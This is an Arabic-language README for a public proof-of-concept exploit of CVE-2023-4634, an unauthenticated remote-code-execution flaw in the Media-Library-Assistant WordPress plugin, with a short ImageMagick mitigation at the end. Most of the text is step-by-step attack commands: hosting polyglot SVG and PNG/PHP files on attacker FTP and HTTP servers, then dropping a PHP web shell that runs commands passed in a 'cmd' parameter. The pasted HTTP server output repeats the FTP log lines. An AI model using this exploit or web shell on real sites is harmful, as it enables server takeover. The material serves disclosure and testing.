
CVE-2023-4634
استغلال RCE لبرنامج WordPress Plugin Media-Library Plugin الإصدار < 3.10 (CVE-2023-4634)
اكتشفت Patrowl ثغرة RCE غير مصرح بها في إصدار < 3.10 من إضافة Media-Library-Assistant لووردبريس. الاستغلال ليس تافهًا ويتطلب إعدادًا بسيطًا كما هو موضح أدناه.
يمكن العثور على الاكتشاف العام واستغلال الثغرة في مدونتنا: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
يمكن إجراء كشف الثغرة باستخدام فحص DNS أساسي على خادم FTP بعيد. يمكن العثور على قالب nuclei في: CVE-2023-4634.yaml.
nuclei -u http://x.x.x.x -t ./CVE-2023-4634.yaml
يمكن بعد ذلك إجراء الاستغلال الكامل و RCE باستخدام سكربت CVE-2023-4634.py.
ملاحظة: يمكنك أيضًا استخدام السكربت لاستغلال أبسط مثل LFI، فقط تحتاج إلى صنع SVG خاص واستضافته على FTP الخاص بك، اتبع التوصيات في مدونتنا.
تثبيت المتطلبات:
python3 -m pip install -r requirements.txt
ثم
python3 CVE-CVE-2023-4634.py -h
يعطيك:
usage: CVE-2023-4634 Exploit [-h] [--target [TARGET]] [--remoteftp [REMOTEFTP]] [--remotehttp [REMOTEHTTP]] [--svg_polyglot_name [SVG_POLYGLOT_NAME]] [--svg_exploiter_names [SVG_EXPLOITER_NAMES]] [--png_polyglot_name [PNG_POLYGLOT_NAME]] [--concurrency [CONCURRENCY]] [--generatesvg | --no-generatesvg] [--webserverpath WEBSERVERPATH]
[--exploitname EXPLOITNAME] [--generatepng | --no-generatepng] [--payload PAYLOAD]
Exploit CVE-2023-4634 on Media-Library-Assistant version < 3.10
options:
-h, --help show this help message and exit
--target [TARGET] URL of the Target, ex http://victimwordpress.org
--remoteftp [REMOTEFTP]
URL of the remote FTP use to store SVGs files, ex ftp://X.X.X.X:PORT
--remotehttp [REMOTEHTTP]
URL of the remote HTTP use to store the final Polyglot PNG/PHP file, ex http://X.X.X.X:PORT
--svg_polyglot_name [SVG_POLYGLOT_NAME]
Name of the external polyglot SVG/MSL file used (for generation or final usage), example : poly.svg
--svg_exploiter_names [SVG_EXPLOITER_NAMES]
Name of the external VID bruteforcers file use, the FUZZ part will be replaced by the first letter bruteforced (for generation or final usage), ex: exploiter_FUZZ.svg
--png_polyglot_name [PNG_POLYGLOT_NAME]
Name of the external PNG/PHP to use (for generation or final usage), ex: exploiter_FUZZ.svg
--concurrency [CONCURRENCY]
Number of concurrent long SVG conversion requests to make ( default 100 )
--generatesvg, --no-generatesvg
Generate both polyglot SVG/MSL file and VID bruteforcer within the remote_ftp directory
--webserverpath WEBSERVERPATH
Path of the webserver on the victim server (could be found with the LFI and wp-config file) example: /var/www/html
--exploitname EXPLOITNAME
Dropped exploit name example: pwned.php
--generatepng, --no-generatepng
Generate polyglot PNG/PHP file, integrate php file with -payload option in exploit-png folder
--payload PAYLOAD PHP Payload to integrate in the PNG file ex: <?php phpinfo(); ?>
لكي يعمل، تحتاج إلى إعداد على المضيفين البعيدين:
يمكنك تشغيل خادم FTP بسيط باستخدام بايثون:
python3 -m pyftpdlib -p 2122
[I 2023-08-31 12:24:17] concurrency model: async
[I 2023-08-31 12:24:17] masquerade (NAT) address: None
[I 2023-08-31 12:24:17] passive ports: None
[I 2023-08-31 12:24:17] >>> starting FTP server on 0.0.0.0:2122, pid=482661 <<<
بمجرد الإعداد، تحتاج إلى إضافة ملفات SVG/MSL متعددة اللغات وجميع ملفات SVG المستغلة إلى خوادم FTP الخاصة بك، يمكنك إنشاؤها بسهولة باستخدام السكربت:
python3 CVE-2023-4634.py --generatesvg --svg_polyglot_name poly.svg --svg_exploiter_names exploiter_FUZZ.svg --remotehttp http://192.168.1.164:8081 --png_polyglot_name virus.png --webserverpath /var/www/html --exploitname pwned.php
سيقوم بإنشاء في مجلد remote_ftp:
png_polyglot_name من remotettp إلى المسار الوجهة (webserverpath+ exploitname).لاحظ أن السكربت سينسخ أيضًا ملف svg مع [0] في نهايته (poly.svg و poly.svg[0]). كلا الملفين مطلوبان ليعمل الاستغلال.
ضع جميع الملفات التي تم إنشاؤها (العادية و [0]) في الدليل الجذر لخادم FTP الخاص بك. يجب أن يبدو هكذا:
ls remote_ftp/
exploiter_-.svg exploiter_3.svg exploiter_7.svg exploiter_B.svg exploiter_F.svg exploiter_J.svg exploiter_N.svg exploiter_R.svg exploiter_V.svg exploiter_Z.svg
exploiter_-.svg[0] exploiter_3.svg[0] exploiter_7.svg[0] exploiter_B.svg[0] exploiter_F.svg[0] exploiter_J.svg[0] exploiter_N.svg[0] exploiter_R.svg[0] exploiter_V.svg[0] exploiter_Z.svg[0]
exploiter_0.svg exploiter_4.svg exploiter_8.svg exploiter_C.svg exploiter_G.svg exploiter_K.svg exploiter_O.svg exploiter_S.svg exploiter_W.svg exploiter__.svg
exploiter_0.svg[0] exploiter_4.svg[0] exploiter_8.svg[0] exploiter_C.svg[0] exploiter_G.svg[0] exploiter_K.svg[0] exploiter_O.svg[0] exploiter_S.svg[0] exploiter_W.svg[0] exploiter__.svg[0]
exploiter_1.svg exploiter_5.svg exploiter_9.svg exploiter_D.svg exploiter_H.svg exploiter_L.svg exploiter_P.svg exploiter_T.svg exploiter_X.svg poly.svg
exploiter_1.svg[0] exploiter_5.svg[0] exploiter_9.svg[0] exploiter_D.svg[0] exploiter_H.svg[0] exploiter_L.svg[0] exploiter_P.svg[0] exploiter_T.svg[0] exploiter_X.svg[0] poly.svg[0]
exploiter_2.svg exploiter_6.svg exploiter_A.svg exploiter_E.svg exploiter_I.svg exploiter_M.svg exploiter_Q.svg exploiter_U.svg exploiter_Y.svg
exploiter_2.svg[0] exploiter_6.svg[0] exploiter_A.svg[0] exploiter_E.svg[0] exploiter_I.svg[0] exploiter_M.svg[0] exploiter_Q.svg[0] exploiter_U.svg[0] exploiter_Y.svg[0]
يمكنك تشغيل خادم HTTP بسيط باستخدام بايثون:
python3 -m http.server -p 8081
[I 2023-08-31 12:24:17] concurrency model: async
[I 2023-08-31 12:24:17] masquerade (NAT) address: None
[I 2023-08-31 12:24:17] passive ports: None
[I 2023-08-31 12:24:17] >>> starting FTP server on 0.0.0.0:2122, pid=482661 <<<
تحتاج فقط إلى إضافة ملف PNG/PHP متعدد اللغات. يمكنك أيضًا استخدام السكربت لإنشاء الملف وتضمين الحمولة المطلوبة:
python3 CVE-2023-4634.py --generatepng --payload "<?php if(isset(\$_REQUEST['cmd'])){ echo \"<pre>\"; \$cmd = (\$_REQUEST['cmd']); system(\$cmd); echo \"</pre>\"; die; }?>" --png_polyglot_name virus.png
الآن بعد أن أصبح كل من خادم FTP البعيد وخادم HTTP جاهزين، يمكنك بدء الاستغلال على الهدف الضعيف (سيتحقق السكربت مما إذا كان الهدف يستخدم إصدارًا ضعيفًا من الإضافات). مثال:
python3 CVE-2023-4634.py --target http://127.0.0.1 --remoteftp ftp://192.168.1.164:2122 --remotehttp http://192.168.1.164:8081 --svg_polyglot_name poly.svg --svg_exploiter_names exploiter_FUZZ.svg --png_polyglot_name virus.png --exploitname pwned.php
وإذا كان كل شيء على ما يرام، يجب أن تجد ملف exploitname قد تم وضعه داخل webserverpath (يعتمد على كيفية تكوين الاستغلال الخاص بك)
استمتع!
لقد قمت بعمل مقطع فيديو.
https://github.com/Patrowl/CVE-2023-4634/assets/15944951/6f9d356f-f0ec-48df-9037-5f8a4b64e44f
<policy domain="coder" rights="none" pattern="SVG" />
<policy domain="coder" rights="none" pattern="MSL" />
<policy domain="coder" rights="none" pattern="MSVG" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="VID" />
إلى
/etc/ImageMagick-X/policy.xml